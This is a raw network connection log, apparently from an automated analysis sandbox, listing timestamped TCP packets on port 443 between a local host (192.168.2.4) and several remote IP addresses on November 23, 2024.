                                                                                                                                                                                                Nov 23, 2024 16:53:51.931190014 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.931214094 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.931232929 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.931246996 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.931293011 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.965676069 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.965727091 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.965759039 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.965770006 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.965797901 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.965816021 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.974953890 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.974977970 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.975001097 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.975039005 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.975085974 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.975137949 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.975137949 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.988679886 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.988724947 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.988742113 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.988753080 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.988790989 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.988810062 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:52.009778976 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:52.009840012 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:52.009850979 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:52.009869099 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:52.009919882 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:52.046607971 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:52.046629906 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:52.046670914 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:52.046715021 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:52.046744108 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:52.046763897 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:52.058204889 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:52.058260918 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:52.058274984 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:52.058301926 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:52.058327913 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:52.058365107 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:52.058665991 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:52.058712959 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:52.131881952 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:52.131947041 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:52.131957054 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:52.131984949 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:52.132015944 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:52.132038116 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:52.149755955 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:52.149800062 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:52.149827957 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:52.149885893 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:52.149904013 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:52.149919033 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:52.170588017 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:52.170636892 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:52.170665979 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:52.170671940 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:52.170701981 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:52.170722008 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:52.189481020 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:52.189526081 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:52.189559937 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:52.189619064 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:52.189636946 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:52.189659119 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:52.205280066 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:52.205338001 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:52.205380917 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:52.205404043 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:52.205415010 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:54.294569016 CET44349756142.250.181.100192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:54.294673920 CET44349756142.250.181.100192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:54.294728994 CET49756443192.168.2.4142.250.181.100
                                                                                                                                                                                                Nov 23, 2024 16:53:54.835793018 CET49756443192.168.2.4142.250.181.100
                                                                                                                                                                                                Nov 23, 2024 16:53:54.835824966 CET44349756142.250.181.100192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:56.550611019 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:56.550700903 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:56.550787926 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:56.551095963 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:56.551120996 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:58.388139009 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:58.388237953 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:58.389710903 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:58.389734983 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:58.390084028 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:58.399077892 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:58.439374924 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:58.883127928 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:58.883192062 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:58.883234024 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:58.883353949 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:58.883354902 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:58.883385897 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:58.883441925 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.063270092 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.063340902 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.063406944 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.063461065 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.063498020 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.063520908 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.110326052 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.110375881 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.110414028 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.110440969 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.110519886 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.110539913 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.241256952 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.241293907 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.241332054 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.241372108 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.241399050 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.241420984 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.272675991 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.272700071 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.272758961 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.272789001 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.272816896 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.272838116 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.296483994 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.296508074 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.296586037 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.296607018 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.296674013 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.317296028 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.317317009 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.317375898 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.317406893 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.317445040 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.317468882 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.367155075 CET49818443192.168.2.44.175.87.197
                                                                                                                                                                                                Nov 23, 2024 16:53:59.367178917 CET443498184.175.87.197192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.367244005 CET49818443192.168.2.44.175.87.197
                                                                                                                                                                                                Nov 23, 2024 16:53:59.367794037 CET49818443192.168.2.44.175.87.197
                                                                                                                                                                                                Nov 23, 2024 16:53:59.367811918 CET443498184.175.87.197192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.441428900 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.441466093 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.441544056 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.441586971 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.441615105 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.441648960 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.456720114 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.456751108 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.456799984 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.456835032 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.456866026 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.456887960 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.471873999 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.471904993 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.471962929 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.471976995 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.472129107 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.472129107 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.485017061 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.485038042 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.485119104 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.485136032 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.485174894 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.485196114 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.499141932 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.499164104 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.499335051 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.499335051 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.499357939 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.499412060 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.511331081 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.511353970 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.511423111 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.511440992 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.511497974 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.516839027 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.516911030 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.516917944 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.516969919 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.551116943 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.551167965 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.551194906 CET49812443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.551214933 CET4434981213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.823311090 CET49819443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.823414087 CET4434981913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.823518991 CET49819443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.823534012 CET49820443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.823565960 CET4434982013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.823609114 CET49820443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.824147940 CET49821443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.824182034 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.824239969 CET49821443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.824273109 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.824280024 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.824372053 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.825203896 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.825213909 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.825278044 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.825333118 CET49820443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.825344086 CET4434982013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.825407982 CET49819443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.825422049 CET4434981913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.825423002 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.825429916 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.825501919 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.825517893 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:59.825612068 CET49821443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:59.825625896 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:01.256860018 CET443498184.175.87.197192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:01.256942987 CET49818443192.168.2.44.175.87.197
                                                                                                                                                                                                Nov 23, 2024 16:54:01.258537054 CET49818443192.168.2.44.175.87.197
                                                                                                                                                                                                Nov 23, 2024 16:54:01.258544922 CET443498184.175.87.197192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:01.259037971 CET443498184.175.87.197192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:01.267292023 CET49818443192.168.2.44.175.87.197
                                                                                                                                                                                                Nov 23, 2024 16:54:01.311337948 CET443498184.175.87.197192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:01.545067072 CET4434981913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:01.546113014 CET49819443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:01.546186924 CET4434981913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:01.546598911 CET49819443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:01.546617031 CET4434981913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:01.611980915 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:01.613408089 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:01.613847971 CET49821443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:01.613877058 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:01.614746094 CET49821443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:01.614753962 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:01.614846945 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:01.614870071 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:01.615214109 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:01.615220070 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:01.616390944 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:01.616797924 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:01.616815090 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:01.617167950 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:01.617176056 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:01.674227953 CET4434982013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:01.674719095 CET49820443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:01.674736023 CET4434982013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:01.675035000 CET49820443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:01.675039053 CET4434982013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:01.986485958 CET4434981913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:01.986511946 CET4434981913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:01.986583948 CET4434981913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:01.986578941 CET49819443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:01.986643076 CET49819443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:01.986947060 CET49819443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:01.986947060 CET49819443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:01.986989021 CET4434981913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:01.987015963 CET4434981913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:01.991549969 CET49832443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:01.991591930 CET4434983213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:01.991645098 CET49832443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:01.991781950 CET49832443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:01.991791010 CET4434983213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:02.002352953 CET443498184.175.87.197192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:02.002409935 CET443498184.175.87.197192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:02.002453089 CET443498184.175.87.197192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:02.002475023 CET49818443192.168.2.44.175.87.197
                                                                                                                                                                                                Nov 23, 2024 16:54:02.002490044 CET443498184.175.87.197192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:02.002513885 CET49818443192.168.2.44.175.87.197
                                                                                                                                                                                                Nov 23, 2024 16:54:02.002535105 CET49818443192.168.2.44.175.87.197
                                                                                                                                                                                                Nov 23, 2024 16:54:02.045713902 CET443498184.175.87.197192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:02.045758963 CET443498184.175.87.197192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:02.045806885 CET49818443192.168.2.44.175.87.197
                                                                                                                                                                                                Nov 23, 2024 16:54:02.045818090 CET443498184.175.87.197192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:02.045855999 CET49818443192.168.2.44.175.87.197
                                                                                                                                                                                                Nov 23, 2024 16:54:02.045865059 CET443498184.175.87.197192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:02.045928955 CET49818443192.168.2.44.175.87.197
                                                                                                                                                                                                Nov 23, 2024 16:54:02.045962095 CET443498184.175.87.197192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:02.046020985 CET49818443192.168.2.44.175.87.197
                                                                                                                                                                                                Nov 23, 2024 16:54:02.049690962 CET49818443192.168.2.44.175.87.197
                                                                                                                                                                                                Nov 23, 2024 16:54:02.049700975 CET443498184.175.87.197192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:02.049714088 CET49818443192.168.2.44.175.87.197
                                                                                                                                                                                                Nov 23, 2024 16:54:02.049720049 CET443498184.175.87.197192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:02.059506893 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:02.059694052 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:02.059768915 CET49821443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:02.062794924 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:02.062854052 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:02.062865019 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:02.062901020 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:02.062916040 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:02.063034058 CET4434982313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:02.063081980 CET49823443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:02.063424110 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:02.063478947 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:02.081090927 CET49821443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:02.081104994 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:02.081135988 CET49821443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:02.081142902 CET4434982113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:02.082384109 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:02.082406998 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:02.082417965 CET49822443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:02.082423925 CET4434982213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:02.083221912 CET49823443192.168.2.413.107.246.63
